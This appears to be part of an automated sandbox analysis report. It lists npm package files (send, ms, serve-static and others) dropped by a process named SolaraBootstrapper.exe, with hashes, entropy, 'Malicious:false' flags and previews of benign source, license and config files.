                                                  Preview:/* eslint-disable node/no-deprecated-api */..'use strict'..var test = require('tape')..var buffer = require('buffer')..var index = require('./').var safer = require('./safer').var dangerous = require('./dangerous')../* Inheritance tests */..test('Default is Safer', function (t) {. t.equal(index, safer). t.notEqual(safer, dangerous). t.notEqual(index, dangerous). t.end().})..test('Is not a function', function (t) {. [index, safer, dangerous].forEach(function (impl) {. t.equal(typeof impl, 'object'). t.equal(typeof impl.Buffer, 'object'). });. [buffer].forEach(function (impl) {. t.equal(typeof impl, 'object'). t.equal(typeof impl.Buffer, 'function'). }). t.end().})..test('Constructor throws', function (t) {. [index, safer, dangerous].forEach(function (impl) {. t.throws(function () { impl.Buffer() }). t.throws(function () { impl.Buffer(0) }). t.throws(function () { impl.Buffer('a') }). t.throws(function () { impl.Buffer('a', 'utf-8') }). t.throws(funct
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):13301
                                                  Entropy (8bit):4.912166673065034
                                                  Encrypted:false
                                                  SSDEEP:192:MYUow7GhMZcyKOC/YP3tKLT7FlCSh1YVk7R1HTIfDDJ7WU6NZwZZFNAGAom3Xgsi:lUo+EpObsLThPhCEZwZZFN0oZ
                                                  MD5:70FC41FDEA3EFC7100A4E0C3A0DC8448
                                                  SHA1:EC9F95787ADB2FB17CBF6C808C98146DDADC4677
                                                  SHA-256:A08B6BAFFACFBD0BA14CDAC367BB7B2E809B91381DCCA79633E68518ED360C7C
                                                  SHA-512:E156CF9C02CC173B8368000A9F184E1E376EB880C9ECEBA2284EEB24CD7C454DE0C525146CF52ADFE7671FC928052C8BB42E1DAA662CC12829D5C06B2E995FA6
                                                  Malicious:false
                                                  Preview:0.18.0 / 2022-03-23.===================.. * Fix emitted 416 error missing headers property. * Limit the headers removed for 304 response. * deps: depd@2.0.0. - Replace internal `eval` usage with `Function` constructor. - Use instance methods on `process` to check for listeners. * deps: destroy@1.2.0. * deps: http-errors@2.0.0. - deps: depd@2.0.0. - deps: statuses@2.0.1. * deps: on-finished@2.4.1. * deps: statuses@2.0.1..0.17.2 / 2021-12-11.===================.. * pref: ignore empty http tokens. * deps: http-errors@1.8.1. - deps: inherits@2.0.4. - deps: toidentifier@1.0.1. - deps: setprototypeof@1.2.0. * deps: ms@2.1.3..0.17.1 / 2019-05-10.===================.. * Set stricter CSP header in redirect & error responses. * deps: range-parser@~1.2.1..0.17.0 / 2019-05-03.===================.. * deps: http-errors@~1.7.2. - Set constructor name when possible. - Use `toidentifier` module to make class names. - deps: depd@~1.1.2. - deps: setprototypeo
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1128
                                                  Entropy (8bit):5.156120084449652
                                                  Encrypted:false
                                                  SSDEEP:24:aiJH/ZHHuyPP3GtIHw1Gg9MPH+sUW8Ok4odZo3U/qldFD:aiJfxfPvGt7ICMPH+sfINi3OMFD
                                                  MD5:5F1A8369A899B128AAA8A59D60D00B40
                                                  SHA1:B8F341A3A86A825ED75E0DAD5B7CB0EF8EBBBC29
                                                  SHA-256:25A328069FE771F8ED5B6F983ED4B0E6C84B3312AC0F69B28C3D52DC277962C9
                                                  SHA-512:CCA39054E9B2CFE7B076D28F19A775AFE05EB0E7643C8AF827143E2F6A9EB59CC668D83DD1E73390908CB8037142B8086141292C6472821F48C9BECC4CAD02DF
                                                  Malicious:false
                                                  Preview:(The MIT License)..Copyright (c) 2012 TJ Holowaychuk.Copyright (c) 2014-2022 Douglas Christopher Wilson..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CON
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):9476
                                                  Entropy (8bit):4.909515762700429
                                                  Encrypted:false
                                                  SSDEEP:192:QsQv44A5+IKFLvZWg54FNlgd+0j6X+Ktw+Nja3DBs7RpF3BHYPy9BPGjNhEfy9:JQv44XFLvZWgsFW6XjtTjazBI13u59
                                                  MD5:58D01CF4D34779852C06A3C5301A44F3
                                                  SHA1:91C3546C7FEDE667861C951B826080D9EBDD8738
                                                  SHA-256:08F465B588AF742601818744E54A68927A3F76C0AC831520C411C1C82334BA11
                                                  SHA-512:36405A81AFEEDC6BFE52EF08B3B2187A56742F44C9809DBE91F155D9CED8500E134190802618A2C79FD0D3B0E69F518A7CE9C84B20C7E4432922426389D585A6
                                                  Malicious:false
                                                  Preview:# send..[![NPM Version][npm-version-image]][npm-url].[![NPM Downloads][npm-downloads-image]][npm-url].[![Linux Build][github-actions-ci-image]][github-actions-ci-url].[![Windows Build][appveyor-image]][appveyor-url].[![Test Coverage][coveralls-image]][coveralls-url]..Send is a library for streaming files from the file system as a http response.supporting partial responses (Ranges), conditional-GET negotiation (If-Match,.If-Unmodified-Since, If-None-Match, If-Modified-Since), high test coverage,.and granular events which may be leveraged to take appropriate actions in your.application or framework...Looking to serve up entire folders mapped to URLs? Try [serve-static](https://www.npmjs.org/package/serve-static)...## Installation..This is a [Node.js](https://nodejs.org/en/) module available through the.[npm registry](https://www.npmjs.com/). Installation is done using the.[`npm install` command](https://docs.npmjs.com/getting-started/installing-npm-packages-locally):..```bash.$ npm insta
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1170
                                                  Entropy (8bit):4.464334371428507
                                                  Encrypted:false
                                                  SSDEEP:24:11oSZ8gGzDRSKH+ZKWKKDF925a/7kJyEyF0eOCYunEfu7WR:1LS/RTjVha/7xPYun7WR
                                                  MD5:B6061B0B7F151ABED066DC528DD952EF
                                                  SHA1:FFB7B88D91CE00E18EB7496D5B30A38018069CAE
                                                  SHA-256:9E6289FAF7A1BDB454335B2234D188C178C6FD932D1533326170ED62D157663E
                                                  SHA-512:0F15221E6A4F6756314F5B6E92105DD2A28858BA479E60F511C6D05EFE5DDBD6E5E646CD47146042575E0DBB249E88F8D59DBCB10FA5004C4CA1E947C70E6B55
                                                  Malicious:false
                                                  Preview:# Security Policies and Procedures..## Reporting a Bug..The `send` team and community take all security bugs seriously. Thank you.for improving the security of Express. We appreciate your efforts and.responsible disclosure and will make every effort to acknowledge your.contributions...Report security bugs by emailing the current owner(s) of `send`. This information.can be found in the npm registry using the command `npm owner ls send`..If unsure or unable to get the information from the above, open an issue.in the [project issue tracker](https://github.com/pillarjs/send/issues).asking for the current contact information...To ensure the timely response to your report, please ensure that the entirety.of the report is contained within the email body and not solely behind a web.link or an attachment...At least one owner will acknowledge your email within 48 hours, and will send a.more detailed response within 48 hours indicating the next steps in handling.your report. After the initial rep
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):23502
                                                  Entropy (8bit):4.883029861419584
                                                  Encrypted:false
                                                  SSDEEP:384:XxKaZnHXuj0j+Ax0HSD1iYojlJlJUDirWEbOqWaeOdz5Qq8m3ZeT9ejdhsb9nag6:oO3usrx0frN9b15AcjAUgVjmb
                                                  MD5:638E22792701426DA6DCFE743A272762
                                                  SHA1:DD7D90E571E262697A0914CE438CECE05EF6F9AF
                                                  SHA-256:9196D51E83C8142B5CA56A4D9A0352DB4E6FE0A983D9AFEB40F8531FB80455A2
                                                  SHA-512:0D232D3831144C806D4815EFC18A19DFC1BD33AE618E37FDBB6766B82DEC84B6ABEBF18548C302AAF452545553BFEC843AF853F7B2DAA33F62EB3893FFBDAF91
                                                  Malicious:false
                                                  Preview:/*!. * send. * Copyright(c) 2012 TJ Holowaychuk. * Copyright(c) 2014-2022 Douglas Christopher Wilson. * MIT Licensed. */..'use strict'../**. * Module dependencies.. * @private. */..var createError = require('http-errors').var debug = require('debug')('send').var deprecate = require('depd')('send').var destroy = require('destroy').var encodeUrl = require('encodeurl').var escapeHtml = require('escape-html').var etag = require('etag').var fresh = require('fresh').var fs = require('fs').var mime = require('mime').var ms = require('ms').var onFinished = require('on-finished').var parseRange = require('range-parser').var path = require('path').var statuses = require('statuses').var Stream = require('stream').var util = require('util')../**. * Path function references.. * @private. */..var extname = path.extname.var join = path.join.var normalize = path.normalize.var resolve = path.resolve.var sep = path.sep../**. * Regular expression for identifying a bytes Range header.. * @private. */..var
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):3024
                                                  Entropy (8bit):4.754385499254461
                                                  Encrypted:false
                                                  SSDEEP:48:OvI4pOT+wFLQtahYQlCrFWn5V4W55i8v1BeH321aEEg1JPjayheWy0DywdjyG1JC:OgNywFLQY2SChWn5V4W55F6XeaErOyX4
                                                  MD5:83C46187ED7B1E33A178F4C531C4EA81
                                                  SHA1:EA869663486F513CC4D1CA8312ED52A165C417FA
                                                  SHA-256:E5F0B6A946A9B2B356A28557728410717DF54EA2F599EDB619F9839DF6B7B0E9
                                                  SHA-512:51B45089A53A23C12E28EB889396E2FA71B95085BAA5AC34D71FFB625131BF2FEC3AE98EFEAE537656E20EA257F44E089BCEBC9AD54CF672CDE852102E43E153
                                                  Malicious:false
                                                  Preview:/**. * Helpers.. */..var s = 1000;.var m = s * 60;.var h = m * 60;.var d = h * 24;.var w = d * 7;.var y = d * 365.25;../**. * Parse or format the given `val`.. *. * Options:. *. * - `long` verbose formatting [false]. *. * @param {String|Number} val. * @param {Object} [options]. * @throws {Error} throw an error if val is not a non-empty string or a number. * @return {String|Number}. * @api public. */..module.exports = function (val, options) {. options = options || {};. var type = typeof val;. if (type === 'string' && val.length > 0) {. return parse(val);. } else if (type === 'number' && isFinite(val)) {. return options.long ? fmtLong(val) : fmtShort(val);. }. throw new Error(. 'val is not a non-empty string or a valid number. val=' +. JSON.stringify(val). );.};../**. * Parse the given `str` and return milliseconds.. *. * @param {String} str. * @return {Number}. * @api private. */..function parse(str) {. str = String(str);. if (str.length > 100) {. return;. }
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1079
                                                  Entropy (8bit):5.100083983397303
                                                  Encrypted:false
                                                  SSDEEP:24:bRDrmJHHH0yN3gtsHw1hC09QHOsUv4eOk4/+/m3oqLFh:bRDaJHlxE3dQHOs5exm3ogFh
                                                  MD5:2B8BC52AE6B7BA58E1629DEABD53986F
                                                  SHA1:AC646EA4EC65CD1FEAC459A194A15A52D147BDCF
                                                  SHA-256:1662FAE9B5314D11CF51284E2DCD1F006A354F7343F08712A730FCFF9A359801
                                                  SHA-512:99536ECE73C2F788FA74C42BFABC044D3966812FFB9A9D30BB9183371999BB4067B26C1B36D40738444A37C341FD5B9B5E833C9D40884B99D39147E5A9E3F3DE
                                                  Malicious:false
                                                  Preview:The MIT License (MIT)..Copyright (c) 2020 Vercel, Inc...Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):732
                                                  Entropy (8bit):4.430071999887843
                                                  Encrypted:false
                                                  SSDEEP:12:7t1BLRJVkIMK/GCjxVMzaFT1oNkQc5s5RBR74J3YGqCVCYcCWhU9R:51BLR2UJFT1ou1s1R76YtCIY1WGR
                                                  MD5:A682078F64A677DDAD1F50307A14B678
                                                  SHA1:C290EB97736177176D071DA4AC855AB995685C97
                                                  SHA-256:1A6B4D9739790C0B94AB96C8CC0507E281C164C311FF4FBF5E57FB8D26290B40
                                                  SHA-512:9E16C5689B57275F4ED624C6954F12299706E2372A60F6173421800DA5EDF9ED52E52FD2B0798F826CDDBADE6CA19A6E6A996960C6697CC2DA0DDECB36409520
                                                  Malicious:false
                                                  Preview:{. "name": "ms",. "version": "2.1.3",. "description": "Tiny millisecond conversion utility",. "repository": "vercel/ms",. "main": "./index",. "files": [. "index.js". ],. "scripts": {. "precommit": "lint-staged",. "lint": "eslint lib/* bin/*",. "test": "mocha tests.js". },. "eslintConfig": {. "extends": "eslint:recommended",. "env": {. "node": true,. "es6": true. }. },. "lint-staged": {. "*.js": [. "npm run lint",. "prettier --single-quote --write",. "git add". ]. },. "license": "MIT",. "devDependencies": {. "eslint": "4.18.2",. "expect.js": "0.3.1",. "husky": "0.14.3",. "lint-staged": "5.0.0",. "mocha": "4.0.1",. "prettier": "2.0.5". }.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1886
                                                  Entropy (8bit):4.949803212299634
                                                  Encrypted:false
                                                  SSDEEP:24:TSBe9CsGdPXkjj6CWe6E1j89DkMlkxZ2oGULLZjlwpVHBbGP7vQV:mBegDojklOxI5UxjeJbGk
                                                  MD5:1E31F4878F79731FEAE6D1BCC2F1CA7A
                                                  SHA1:E5AF6580FACBF96AAC53741846D5845CA716FF97
                                                  SHA-256:8BF6C4F414B123EA2A9375B91982882D01D8561CE7D12E3BB4F448C23359F040
                                                  SHA-512:A59C23B8956ED13C415035F09B19EA03D4C9B6759EF71D042735871F46352F444287B0C3DD55F564DDE5D97CD765E4C1668D757387C0B5889C5858B10C26BF2D
                                                  Malicious:false
                                                  Preview:# ms..![CI](https://github.com/vercel/ms/workflows/CI/badge.svg)..Use this package to easily convert various time formats to milliseconds...## Examples..```js.ms('2 days') // 172800000.ms('1d') // 86400000.ms('10h') // 36000000.ms('2.5 hrs') // 9000000.ms('2h') // 7200000.ms('1m') // 60000.ms('5s') // 5000.ms('1y') // 31557600000.ms('100') // 100.ms('-3 days') // -259200000.ms('-1h') // -3600000.ms('-200') // -200.```..### Convert from Milliseconds..```js.ms(60000) // "1m".ms(2 * 60000) // "2m".ms(-3 * 60000) // "-3m".ms(ms('10 hours')) // "10h".```..### Time Format Written-Out..```js.ms(60000, { long: true }) // "1 minute".ms(2 * 60000, { long: true }) // "2 minutes".ms(-3 * 60000, { long: true }) // "-3 minutes".ms(ms('10 hours'), { long: true }) // "10 hours".```..## Features..- Works both in [Node.js](https://nodejs.org) and in the browser.- If a number is supplied to `ms`, a string
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1571
                                                  Entropy (8bit):4.806645242071415
                                                  Encrypted:false
                                                  SSDEEP:48:DXFYV0VT+MPn2DRxYhNf3+dQuNCHRIzUnFbqye5:D19UMvvdyNInFbqye5
                                                  MD5:331E9BE93662FD4127E84BEED1B3C82C
                                                  SHA1:DC3C65D7EB895741FAEC3AA7419BE8B7ED7F3C5D
                                                  SHA-256:B7DF451530D0B58EE3AED7F355D2AFDF04860F55C32D0D0BB1CEB65B85189B22
                                                  SHA-512:A7C29AB6805A3AC585877CC236108E36FDA23937ECBA8C77BEB1078885C5467CBE3BAC968AA6F4571F59FFB7FD2911BFA5EF39ADC3FD727FF9F7BE50A6F5AFF0
                                                  Malicious:false
                                                  Preview:{. "name": "send",. "description": "Better streaming static file server with Range and conditional-GET support",. "version": "0.18.0",. "author": "TJ Holowaychuk <tj@vision-media.ca>",. "contributors": [. "Douglas Christopher Wilson <doug@somethingdoug.com>",. "James Wyatt Cready <jcready@gmail.com>",. "Jes.s Legan.s Combarro <piranna@gmail.com>". ],. "license": "MIT",. "repository": "pillarjs/send",. "keywords": [. "static",. "file",. "server". ],. "dependencies": {. "debug": "2.6.9",. "depd": "2.0.0",. "destroy": "1.2.0",. "encodeurl": "~1.0.2",. "escape-html": "~1.0.3",. "etag": "~1.8.1",. "fresh": "0.5.2",. "http-errors": "2.0.0",. "mime": "1.6.0",. "ms": "2.1.3",. "on-finished": "2.4.1",. "range-parser": "~1.2.1",. "statuses": "2.0.1". },. "devDependencies": {. "after": "0.8.2",. "eslint": "7.32.0",. "eslint-config-standard": "14.1.1",. "eslint-plugin-import": "2.25.4",. "eslint-plugin-markdown"
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):10537
                                                  Entropy (8bit):4.7665307771987315
                                                  Encrypted:false
                                                  SSDEEP:192:afmz/Bgt7ZlMa2xZ+vfj5Jxjt9E620KWdSDe3z6aLNm6/5ajOoHEi2J71D2ann7+:s9+xWTpZCW4ZF
                                                  MD5:D460E9636FA12D04AB2439D2660C2DEE
                                                  SHA1:730FD99A27A77117AEBCD298D0C0330068309ACF
                                                  SHA-256:A93DBAA07121D81A3B20EF0430835751C7BB4EBEC598D7C5757CD918F2B51526
                                                  SHA-512:211B5B18FC317CB2C2BAB7D26A581BD2D0056FBE25D838ED1DD6F7C7D32E01DB4969BA07CF50EB4425468430C1DDF9796304562530D044BF134B23DFED57AAFB
                                                  Malicious:false
                                                  Preview:1.15.0 / 2022-03-24.===================.. * deps: send@0.18.0. - Fix emitted 416 error missing headers property. - Limit the headers removed for 304 response. - deps: depd@2.0.0. - deps: destroy@1.2.0. - deps: http-errors@2.0.0. - deps: on-finished@2.4.1. - deps: statuses@2.0.1..1.14.2 / 2021-12-15.===================.. * deps: send@0.17.2. - deps: http-errors@1.8.1. - deps: ms@2.1.3. - pref: ignore empty http tokens..1.14.1 / 2019-05-10.===================.. * Set stricter CSP header in redirect response. * deps: send@0.17.1. - deps: range-parser@~1.2.1..1.14.0 / 2019-05-07.===================.. * deps: parseurl@~1.3.3. * deps: send@0.17.0. - deps: http-errors@~1.7.2. - deps: mime@1.6.0. - deps: ms@2.1.1. - deps: statuses@~1.5.0. - perf: remove redundant `path.normalize` call..1.13.2 / 2018-02-07.===================.. * Fix incorrect end tag in redirects. * deps: encodeurl@~1.0.2. - Fix encoding `%` as last character. * deps:
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):1189
                                                  Entropy (8bit):5.18664113055731
                                                  Encrypted:false
                                                  SSDEEP:24:PwiJH/ZHHuyPP3GtIHw1Gg9MPH+sUW8Ok4odZo3U/qldFD:YiJfxfPvGt7ICMPH+sfINi3OMFD
                                                  MD5:27B1707520B14D0BC890F4E75CD387B0
                                                  SHA1:B64277842BAF8DC240F2DBD3BA92AD47295CD833
                                                  SHA-256:63B9A188D7D43E64B0558B7115255045B9FE20A5FC3FF483421CB899E7F52BCB
                                                  SHA-512:7046DEA66E03A5AA88A8C0658824EFD17E87FAB8F184CE2FD9AF9620961FD2E72EAC8DBD7D0FF70FAE99433D517B5CD927C1217E362620F1991629CAF1BD2C84
                                                  Malicious:false
                                                  Preview:(The MIT License)..Copyright (c) 2010 Sencha Inc..Copyright (c) 2011 LearnBoost.Copyright (c) 2011 TJ Holowaychuk.Copyright (c) 2014-2016 Douglas Christopher Wilson..Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the.'Software'), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT..IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY.C
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):7812
                                                  Entropy (8bit):4.900247938569799
                                                  Encrypted:false
                                                  SSDEEP:192:ClQe5+IIF2afJ9Cmy4FNhgd+jCW7n6OQZGSHa1XP:pFhfP1Ff7XQZ9a1/
                                                  MD5:8EB080567B88684DCC6729DF62F472FB
                                                  SHA1:080B006AF31ED97EA5B899A5CA5AB3DA10ED7BD2
                                                  SHA-256:7C2479F5A6B23AE5C27A5383969788C19D2F3C36839F5691CF2C0CE27B54CD68
                                                  SHA-512:532A28AA62FF1B98D3AD5BA6B5D85A8789BADB967E35F067235AA5B7C462DFA994245D7F68B895BF3FD02F0C5694A8E48E5F91A20E758ADC7CBE143786B75358
                                                  Malicious:false
                                                  Preview:# serve-static..[![NPM Version][npm-version-image]][npm-url].[![NPM Downloads][npm-downloads-image]][npm-url].[![Linux Build][github-actions-ci-image]][github-actions-ci-url].[![Windows Build][appveyor-image]][appveyor-url].[![Test Coverage][coveralls-image]][coveralls-url]..## Install..This is a [Node.js](https://nodejs.org/en/) module available through the.[npm registry](https://www.npmjs.com/). Installation is done using the.[`npm install` command](https://docs.npmjs.com/getting-started/installing-npm-packages-locally):..```sh.$ npm install serve-static.```..## API..```js.var serveStatic = require('serve-static').```..### serveStatic(root, options)..Create a new middleware function to serve files from within a given root.directory. The file to serve will be determined by combining `req.url`.with the provided root directory. When a file is not found, instead of.sending a 404 response, this module will instead call `next()` to move on.to the next middleware, allowing for stacking and
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:HTML document, ASCII text
                                                  Category:dropped
                                                  Size (bytes):4570
                                                  Entropy (8bit):4.814119702173696
                                                  Encrypted:false
                                                  SSDEEP:96:U5iiqzjxK4F4PTTMMatmWiuj8GvWbWc3THjefc4WoU:UrqzjxjFYwMaHQGvWicDjkc4WoU
                                                  MD5:3707F8D6EE2C6D88FFAB23C0C4F1509B
                                                  SHA1:1245000610229E2F79A8FFA95A40B08242371DB0
                                                  SHA-256:768D6407E86BA974E7B8A0E79625E76A932B1F2503207C87F871FCF98BE21B1E
                                                  SHA-512:CCB0EF9F4BEF48F16CFCF54322D306AB04920BD1339D3B667269BDA092E2B4CE5372ADD10A683AE9E2A7451DF168CEB494667FA2B50CE1DBC1FC468EAD6D715C
                                                  Malicious:false
                                                  Preview:/*!. * serve-static. * Copyright(c) 2010 Sencha Inc.. * Copyright(c) 2011 TJ Holowaychuk. * Copyright(c) 2014-2016 Douglas Christopher Wilson. * MIT Licensed. */..'use strict'../**. * Module dependencies.. * @private. */..var encodeUrl = require('encodeurl').var escapeHtml = require('escape-html').var parseUrl = require('parseurl').var resolve = require('path').resolve.var send = require('send').var url = require('url')../**. * Module exports.. * @public. */..module.exports = serveStatic.module.exports.mime = send.mime../**. * @param {string} root. * @param {object} [options]. * @return {function}. * @public. */..function serveStatic (root, options) {. if (!root) {. throw new TypeError('root path required'). }.. if (typeof root !== 'string') {. throw new TypeError('root path must be a string'). }.. // copy options object. var opts = Object.create(options || null).. // fall-though. var fallthrough = opts.fallthrough !== false.. // default redirect. var redirect = opts.re
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):1141
                                                  Entropy (8bit):4.774022472328274
                                                  Encrypted:false
                                                  SSDEEP:24:KI3rH1etPlI6RxFs/QRYuNCHRIZBlW2wfM9pjZKLl105P6u:KAxc9VRxFXYuNCHRIzU26M3jo703
                                                  MD5:C72C82DF31AD86A65E2E48C33C03988B
                                                  SHA1:EED66F41A584415A2BFDE1842522C4AFF72D98C5
                                                  SHA-256:9A5793EE291365AA13C0DA4148F7150B5FAB012D03A6FBD8AC456463C745BD18
                                                  SHA-512:BA67DA54A20C64BA131D878E54BA13C59FEB75B6F9FE3FA8318A98928A603FD14494D3127C917F2A3787C95C41DBA3B27281C772CDE5696777B518B3B53FEBF0
                                                  Malicious:false
                                                  Preview:{. "name": "serve-static",. "description": "Serve static files",. "version": "1.15.0",. "author": "Douglas Christopher Wilson <doug@somethingdoug.com>",. "license": "MIT",. "repository": "expressjs/serve-static",. "dependencies": {. "encodeurl": "~1.0.2",. "escape-html": "~1.0.3",. "parseurl": "~1.3.3",. "send": "0.18.0". },. "devDependencies": {. "eslint": "7.32.0",. "eslint-config-standard": "14.1.1",. "eslint-plugin-import": "2.25.4",. "eslint-plugin-markdown": "2.2.1",. "eslint-plugin-node": "11.1.0",. "eslint-plugin-promise": "5.2.0",. "eslint-plugin-standard": "4.1.0",. "mocha": "9.2.2",. "nyc": "15.1.0",. "safe-buffer": "5.2.1",. "supertest": "6.2.2". },. "files": [. "LICENSE",. "HISTORY.md",. "index.js". ],. "engines": {. "node": ">= 0.8.0". },. "scripts": {. "lint": "eslint .",. "test": "mocha --reporter spec --bail --check-leaks test/",. "test-ci": "nyc --reporter=lcov --reporter=text npm test",.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):404
                                                  Entropy (8bit):4.641505932782478
                                                  Encrypted:false
                                                  SSDEEP:12:ErxN1nqqvn0uJSHqkjxN0nNzqqvgI/Z9IUsX:Erxfbv/S5iNbvgI/Z9IJ
                                                  MD5:958819B0CFC4FDAB8D082765759902DE
                                                  SHA1:968156D36F95DA6E5B9F535A394A7466DE632782
                                                  SHA-256:015178C037E4DB81415AAB3D6ACD2A4EF66341EC500F900EECA61349802A3FB6
                                                  SHA-512:59A9A196BC520703FADCD200BA3072EB2ACA951372F88AE6491C0126D54E093DAEEA95FEEF0B555256CE5914C583A28099484CAC4D73AA088F425A1C220F6174
                                                  Malicious:false
                                                  Preview:{.."root": true,..."extends": "@ljharb",..."rules": {..."id-length": "off",..."new-cap": ["error", {...."capIsNewExceptions": [....."GetIntrinsic"....],...}],..."no-extra-parens": "off",..},..."overrides": [...{...."files": ["test/**/*.js"],...."rules": {....."id-length": "off",....."max-lines-per-function": "off",....."multiline-comment-style": "off",....."no-empty-function": "off",....},...},..],.}.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:ASCII text
                                                  Category:dropped
                                                  Size (bytes):563
                                                  Entropy (8bit):4.602395768056389
                                                  Encrypted:false
                                                  SSDEEP:12:OjjcfQWARgMqJugMJPH0FggM5azFlgM01bZBgMoGbQjgMy9gMLzgMT:qoQWAg0g+H0mgNFlg7g1GegJ9gEzgs
                                                  MD5:999B44EFE89CCAA850EEBF94382A50F3
                                                  SHA1:C1A2B9E96EE391DCB623AA0BFF1AD5A069614854
                                                  SHA-256:BB2F341B76359BFE3F959FB2B1A922212CFDBA4EDB48D108EF848D8A39EC6BF1
                                                  SHA-512:6C155B5D9AEAF5956C0000C2DE4145B62F72C10519AC5A2CD3031EDCA25383056A93685EC52CE4578759E6AC0A351099C9F41446171380504201A5C153A556B5
                                                  Malicious:false
                                                  Preview:# These are supported funding model platforms..github: [ljharb].patreon: # Replace with a single Patreon username.open_collective: # Replace with a single Open Collective username.ko_fi: # Replace with a single Ko-fi username.tidelift: npm/set-function-name.community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry.liberapay: # Replace with a single Liberapay username.issuehunt: # Replace with a single IssueHunt username.otechie: # Replace with a single Otechie username.custom: # Replace with a single custom sponsorship URL.
                                                  Process:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                  File Type:JSON data
                                                  Category:dropped
                                                  Size (bytes):216
                                                  Entropy (8bit):4.771900676344982
                                                  Encrypted:false
                                                  SSDEEP:6:Kw9OfyFdRaB9yq2TpR6S8U7XfUGUiMIOJHhBK:5O6FTaB9WTpR65U7cAMjJHe
                                                  MD5:C2AB942102236F987048D0D84D73D960
                                                  SHA1:95462172699187AC02EAEC6074024B26E6D71CFF
                                                  SHA-256:948366FEA3B423A46366326D0BB2E54B08ABD1CF0B243678BA6625740C40DA5A
                                                  SHA-512:E36B20C16CEEB090750F3865EFC8D7FD983AE4E8B41C30CC3865D2FD4925BF5902627E1F1ED46C0FF2453F076EF9DE34BE899EF57754B29CD158440071318479
                                                  Malicious:false
                                                  Preview:{.."all": true,.."check-coverage": false,.."reporter": ["text-summary", "text", "html", "json"],.."lines": 86,.."statements": 85.93,.."functions": 82.43,.."branches": 76.06,.."exclude": [..."coverage",..."test"..].}.
